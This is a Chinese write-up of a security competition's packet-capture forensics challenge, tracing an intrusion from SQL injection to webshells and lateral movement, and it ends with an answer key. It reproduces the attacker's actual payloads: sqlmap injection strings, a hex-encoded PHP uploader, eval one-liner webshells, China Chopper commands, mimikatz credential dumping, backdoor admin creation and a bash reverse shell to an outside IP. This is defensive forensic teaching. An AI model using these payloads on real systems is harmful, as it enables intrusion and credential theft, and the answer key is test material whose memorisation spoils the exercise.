2018.6.1-铁人三项赛数据赛数据包分析

6月1号 信息安全铁人三项赛分区赛数据包分析练习

1. 数据包下载链接

1
2
链接: https://pan.baidu.com/s/1p2bxf-R6LE5BuaLAzpIbfQ 提取码: ezpw 
解压密码: t3sec.org.cn

2. 题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器12(格式:空格分隔,按黑客攻击顺序排列)  
2.两台服务器的主机名分别是什么  
3.黑客使用了什么工具对服务器1进行的攻击(小写)  
4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)  
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)  
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)  
7.服务器1安装的修补程序名称  
8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)  
9.黑客使用什么命令或文件进行的内网扫描  
10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)  
11.黑客执行的什么命令将administrator的密码保存到文件中  
12.服务器1的系统管理员administrator的密码是什么  
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)  
14.服务器1的mysql的root用户的密码是什么  
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径  
16.服务器2的web网站后台账号密码(格式:账号/密码)  
17.黑客在redis未授权访问中反弹shell的ip和端口是多少  
18.黑客拿到root权限后执行的第二条命令是什么  
19.服务器2的root用户密码是什么  
20.黑客向服务器2写入webshell的命令  
21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)

3. 数据包分析过程

根据题干,黑客应该是攻击了网站。

打开第一个数据包,过滤http

1
http

有很多异常请求,对其进行URL解码

1
/about.php?listid=6) AND 5682=5682 AND (8782=8782

很明显进行了SQL注入

1

根据User-Agent,可知黑客使用的工具是SQLMap

黑客的IP是202.1.1.2,被攻击主机的内网IP是192.168.1.74

使用过滤规则

1
http and ip.addr == 202.1.1.2

第一个数据包一直到结尾都在注入数据,打开第二个数据包。

在SQL注入结束,No.74459之后有很多HEAD请求,猜测黑客在爆破后台登录路径之类的东西。

在往后翻,找到GET请求,根据数据包访问的顺序,猜测黑客在login.php输入了账号密码验证码,成功进入了后台。

2

分别追踪TCP数据流

3

根据响应,判断黑客成功登录了后台,所以user/pass/vcode

1
2
UserName=admin&Password=adminlwphp&Code=WD7x
admin/adminlwphp/WD7x

往后分析,黑客登录后台后,通过SQL注入,写了一个可上传文件的马。
No.426570

4

url解码后的请求

1
2
GET /about.php?listid=-8272 OR 9096=9096 LIMIT 0,1 INTO OUTFILE '/WWW/tmpuaezh.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c5757575c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- -- IYtW

16进制编码的是要写的代码。解码后美化一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
if (isset($_REQUEST["upload"])) {
    $dir = $_REQUEST["uploadDir"];
    if (phpversion() < '4.1.0') {
        $file = $HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or die;
    } else {
        $file = $_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"], $dir . "/" . $file) or die;
    }
    @chmod($dir . "/" . $file, 0755);
    echo "File uploaded";
} else {
    echo "<form action=" . $_SERVER["PHP_SELF"] . " method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=\\WWW\\> <input type=submit name=upload value=upload></form>";
}

再往下走,可以了解到,黑客使用SQL注入写入了一个能够上传文件的马,名为tmpuaezh.php
然后上传了一个可以执行命令的马,名为tmpbjhbf.php。最后执行命令在Web目录下写了一个名为abc.php的一句话木马

5

6

1
GET /tmpbjhbf.php?cmd=echo%20%5E%3C%3Fphp%5E%20eval%28%24_POST%5Bge%5D%29%3B%3F%5E%3E%3Eabc.php

解码得

1
echo ^<?php^ eval($_POST[ge]);?^>>abc.php

No.481222个数据包往后,HTTP请求类型为POST,很明显黑客使用菜刀连接上了abc.php这个一句话木马,并且执行了命令
分别进行分析

7

No.481222-No.481224

1
2
ge=@eval(/*12345*/base64_decode($_POST[z0]));
&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==

解码得

1
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();

根据响应包

1
->|C:/WWW	C:	Windows NT TEST-7E28AF8836 5.2 build 3790 (Windows Server 2003 Enterprise Edition Service Pack 2) i586(SYSTEM)|<-

可知 192.168.1.74 是一台Windows主机,主机名为 TEST-7E28AF8836

No.482132-No.482136

1
2
3
4
5
ge=@eval(/*12345*/base64_decode($_POST[z0]));
&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
&z1=QzpcXFdXV1xc

响应

1
C:\\WWW\\

8

No.492080-No.492086

1
2
3
4
ge=@eval(/*12345*/base64_decode($_POST[z0]));
&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRmPSRtP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTtlY2hvKG1rZGlyKCRmKT8iMSI6IjAiKTs7ZWNobygifDwtIik7ZGllKCk7
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$m=get_magic_quotes_gpc();$f=$m?stripslashes($_POST["z1"]):$_POST["z1"];echo(mkdir($f)?"1":"0");;echo("|<-");die();
&z1=C:\\WWW\\my

响应

1
->|1|<-

继续打开第三个数据包

1
http and ip.addr == 202.1.1.2

开头就是菜刀的流量,依次查找
可以知道黑客上传了一个tunnel.nosocket.php来做代理。
上传了一个scan.php用来扫描。
查看了本机的IP地址。

9

1
ge=%40eval%28%2F%2A12345%2A%2Fbase64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XFdXV1wiJm5ldHN0YXQgLWFubyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

10

对执行的命令解码可得黑客执行了netstat -ano

根据题目 允许外连的TCP注册端口 可知为
1025 3306 3389

No.161899

1
Form item: "z2" = "Y2QgL2QgIkM6XFdXV1xteVxtaW1pXCImbWltaWthdHouZXhlICIicHJpdmlsZWdlOjpkZWJ1ZyIiICIic2VrdXJsc2E6OmxvZ29ucGFzc3dvcmRzIiIgZXhpdCA+PiBsb2cudHh0JmVjaG8gW1NdJmNkJmVjaG8gW0Vd"

解码可得

1
cd /d "C:\WWW\my\mimi\"&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> log.txt&echo [S]&cd&echo [E]

黑客将管理员密码保存在文件中。

No.187524-No.187622

1
Form item: "z2" = "Y2QgL2QgIkM6XFdXV1xteVxtaW1pXCImbmV0IHVzZXIgaGFja2VyIGhhY2tlciAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd"

解码得

1
cd /d "C:\WWW\my\mimi\"&net user hacker hacker /add&echo [S]&cd&echo [E]

黑客执行命令添加用户。

No.197634-No.197864

1
Form item: "z2" = "Y2QgL2QgIkM6XFdXV1xteVxtaW1pXCImbmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvciBoYWNrZXIgL2FkZCZlY2hvIFtTXSZjZCZlY2hvIFtFXQ=="

解码得

1
cd /d "C:\WWW\my\mimi\"&net localgroup administrator hacker /add&echo [S]&cd&echo [E]

黑客将用户添加到管理员组。

上传了mimikatz来抓取管理员密码

11

获得administrator的密码为Simplexue123

执行systeminfo

1
ge=%40eval%28%2F%2A12345%2A%2Fbase64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XFdXV1wiJnN5c3RlbWluZm8mZWNobyBbU10mY2QmZWNobyBbRV0%3D

12
可知修补程序 为Q147222

在前面还发现黑客上传了个scan.php

过滤

1
(ip.addr == 202.1.1.2 || ip.addr == 192.168.1.74) and http contains "scan.php"

13

追踪一下流

1
startip=192.168.1.1&endip=192.168.3.255&port=21%2C80%2C8080%2C8888%2C1433%2C3306%2C6379

14

可知存活主机

1
2
3
4
5
6
7
8
9
10
11
12
13
192.168.1.1 80端口开放,推测是网关
192.168.1.8 80,端口开放
192.168.1.33 3306端口开放
192.168.1.74(本机) 80,3306端口开放
192.168.1.159 80,8080,3306端口开放
192.168.1.169 80,3306端口开放
192.168.1.200 21端口开放
192.168.2.1 80端口开放
192.168.2.20 80,3306
192.168.2.66 80,3306,6379 猜测开放redis。。
192.168.2.88 21,80,3306
192.168.3.1 80
192.168.3.6 80,3306

猜测后续黑客会利用192.168.1.74作为跳板来入侵内网

1
http and ip.src == 192.168.1.74 and (ip.dst == 192.168.1.1 || ip.dst ==  192.168.1.8 || ip.dst ==  192.168.1.33 || ip.dst == 192.168.1.159 || ip.dst ==  192.168.1.169 || ip.dst == 192.168.1.200 || ip.dst == 192.168.2.1 || ip.dst == 192.168.2.20 || ip.dst ==  192.168.2.66 || ip.dst == 192.168.2.88|| ip.dst == 192.168.3.1 || ip.dst == 192.168.3.6)

没有什么发现,打开第四个数据包。

直接使用上述表达式过滤,是对192.168.2.66的目录扫描。可以判断192.168.2.66就是受到攻击的另一台主机。

修改一下表达式重新过滤下。

1
http contains "abc.php"

只有几条记录

1
ge=%40eval%28%2F%2A12345%2A%2Fbase64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXFdXV1xcY29uZmlnc1xcY29uZmlnLnBocA%3D%3D\

16

很明显黑客查看了网站的配置文件。

1
2
3
4
$mydbhost="localhost";
$mydbuser="root";
$mydbpw  ="windpasssql";
$mydbname="510cms";

再根据第二台主机上开放6379端口,模式运行redis服务,黑客有可能是在第一台windows主机上使用regeorg作为代理,连接到数据库写马。

但是过滤tcp流量没有发现。

打开第五个数据包。

直接过滤tcp.port == 6379,随便选一个直接follow

17

可以找到黑客利用redis反弹了一个shell

1
bash -i >& /dev/tcp/202.1.1.2/6666 0>&1

反弹到了自己的6666端口上。

说明后面黑客执行的命令走的是tcp的6666端口。

1
tcp.port == 6666 and ip.addr == 202.1.1.2 and ip.addr == 192.168.2.66

直接过滤,follow一下

18

可以看到黑客拥有了有个root的shell
可知主机名为cloude
黑客执行的第二条命令是cd /var/www/html
黑客写入了一个一句话木马

1
echo '<?php eval($_POST[a]);'>indexs.php

在第六个数据包

1
tcp contains "root" and ip.addr == 192.168.2.66

19

20

可找到MD5bab0e4bb1cd7738880b97d0ca3b313f6,解密可得112233.com

即用户密码为

admin/112233.com `

无偿ARP的特征
arp && arp.isgratuitous == true
从第一个数据包开始挨个过滤查看

21
答案是

1
2
3
192.168.3.213
192.168.3.6
192.168.3.19

4.最后答案

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器12(格式:空格分隔,按黑客攻击顺序排列)  
192.168.1.74 192.168.2.66
2.两台服务器的主机名分别是什么?
192.168.1.74 TEST-7E28AF8836
192.168.2.66 cloude
3.黑客使用了什么工具对服务器1进行的攻击(小写)
sqlmap  
4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)  
admin/adminlwphp/WD7x
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)
echo ^<?php^ eval($_POST[ge]);?^>>abc.php
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔) 
1025 3306 3389
7.服务器1安装的修补程序名称
Q147222
8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)  
C:/WWW/
9.黑客使用什么命令或文件进行的内网扫描 
scan.php 
10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)  
11.黑客执行的什么命令将administrator的密码保存到文件中 
cd /d "C:\WWW\my\mimi\"&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> log.txt&echo [S]&cd&echo [E]
12.服务器1的系统管理员administrator的密码是什么
Simplexue123
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)
192.168.1.1-192.168.3.255
14.服务器1的mysql的root用户的密码是什么  
windpasssql
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径  
/etc/shadow
16.服务器2的web网站后台账号密码(格式:账号/密码) 
admin/112233.com 
17.黑客在redis未授权访问中反弹shell的ip和端口是多少
202.1.1.2/6666 
18.黑客拿到root权限后执行的第二条命令是什么
cd /var/www/html
19.服务器2的root用户密码是什么  
Simplexue123
20.黑客向服务器2写入webshell的命令
echo '<?php eval($_POST[a]);'>indexs.php
21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)
192.168.3.213 192.168.3.6 192.168.3.19